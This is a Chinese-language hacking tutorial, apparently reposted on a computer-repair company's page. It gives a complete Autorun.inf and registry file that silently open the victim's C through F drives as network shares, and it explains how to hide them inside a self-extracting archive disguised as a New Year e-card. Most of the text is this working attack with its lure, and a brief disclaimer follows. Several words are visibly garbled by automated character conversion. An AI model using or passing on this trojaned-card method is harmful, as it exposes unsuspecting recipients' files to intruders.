用自解压包入侵
用自解压包删光别人的硬盘,信赖大家都市。我给大家介绍个用自解压包入侵的要领。
如果捆绑一个木马给别人,只需稍有知识的人有杀毒软件就可以看破。如果不消木马,
用些批处置惩罚炸弹、碎片对象文件、或自导入注册表文件,就可以实现各种攻击。
把以下两行生存为Autorun.inf
[Autorun]
open=regedit /s Autorun.reg
把以下一段生存为Autorun.reg
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\c$]
"Path"="c:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
"Path"="D:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\E$]
"Path"="E:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\F$]
"Path"="F:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:
如今是过年时期,电子贺卡漫天飞,将你的自解压包定名为“猴年贺卡”,包里
包个真贺卡,顺便把以上两个文件打包出来,注意要指定文件解包路径。当收贺卡人
点击自解压包时真贺卡被解压的同时,两个文件就悄悄的被解到指定地位。Autorun.inf
必须解到某一分区的根目次,名字不能变,可以设置文件隐蔽属性。
Autorun.reg文件名和开释目次可以任意,可以更好的隐蔽,注意Autorun.inf指向目次精确的中央。
当受害人双击有Autorun.inf的分区时,他的硬盘C、D、E、F分区就被翻开公享。
黑客技术是把双刃剑,请不要用来危害别人,危害别人后果自尊。
网络可以让世界哆嗦,参加我们,实现你的梦想。上宾愿与列位朋友配合发明一片网上天地。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
评论加载中...
|